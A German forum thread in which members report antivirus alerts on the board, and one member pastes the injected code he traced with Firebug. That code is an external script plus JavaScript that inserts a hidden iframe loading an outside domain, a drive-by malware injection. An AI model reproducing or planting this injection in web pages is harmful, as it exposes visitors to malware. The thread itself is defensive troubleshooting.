ACHTUNG "Trojaner On Board"

  • #13

    Moin Leute,


    scheint wohl ein "Trojaner" gewesen zu sein der durch einige Boards gegangen ist....
    Habe die betreffende Zeile nun aus der Index-Datein gelöscht.


    Können die betroffenen bitte noch einmal schauen ob Sie nach wie vor diese Fehlermeldung erhalten??


    PS: Keine Panik das DIng ist nicht wirklich schädlich...


    LG


    GNus

  • #16

    Hatte gestern Abend noch mal schnell ins Forum geschaut und keine Meldung mehr erhalten.


    So weit so gut!


    Aber dann heute morgen wieder das selbe, siehe Screenshot:



    Dann hab ich noch mal mit dem Firebug geschaut wo das her kommt und da ist dieser Code wohl für verantwortlich:


    <script src="http://www.dvmsoft.eu/newsa.js" type="text/javascript">



    function U()
    {
    var l00='';
    var domain='toursoftadom.com';
    var stream='2';
    try{new ActiveXObject('dc');}
    catch(e){l00=document.createElement('div');}
    l00.id='myhidediv';
    l00.style.cssText='position:absolute;width:10px;height:10px;top:0px;left:0px;z-index:-100;visibility:hidden;';
    l00.innerHTML="<iframe src='http://"+domain+"/in.cgi?"+stream+"'></iframe>";
    document.body.appendChild(l00);
    }
    if(!window.NOREPEAT)
    var NOREPEAT=setInterval(function f()
    {
    if(document.body)
    {
    clearInterval(NOREPEAT);
    U();
    }
    },500);


    </script>


    <div id="myhidediv" style="position: absolute; width: 10px; height: 10px; top: 0px; left: 0px; z-index: -100; visibility: hidden;">



    <iframe src="http://toursoftadom.com/in.cgi?2">
    </div>
    </body>
    </html>
    </iframe>
    ');set_cookie('toppedup', '1010101');}"&gt;1
    </a>
    </li>
    <li>


    Da scheint doch wohl mehr in argen zu sein, hast du vielleicht ein "PlugIn" installiert welches das verursacht?


    Gruss Toni

  • #18

    Hallo miteinader ich bin auch seit gestern neue in der forum beigetretn und bei mir kam die meldung gleich nach der registierung bin heute von ander lapi rein der auch so wie ich den avast-antivirus hat und da kam gleich die gleiche meldung




    mfg
    katsoulinos :( :( :(

  • #19







    genauso sieht es bei mir in einigen unterforen auch aus und egal mit welchen browser ich öffne
    grüßle der kleine

    Männer sind wie Zucker, Sie sind Süß und machen Dick,
    Wer mit dem Finger auf andere zeigt, sollte nicht vergessen, das dabei immer drei Finger seiner Hand auf ihn selbst gerichtet sind.

  • Hey,

    dir scheint die Diskussion zu gefallen, aber du bist nicht angemeldet.

    Wenn du ein kostenloses Konto eröffnest merken wir uns deinen Lesefortschritt und bringen dich dorthin zurück. Zudem können wir dich per E-Mail über neue Beiträge informieren. Dadurch verpasst du nichts mehr.


    Jetzt anmelden!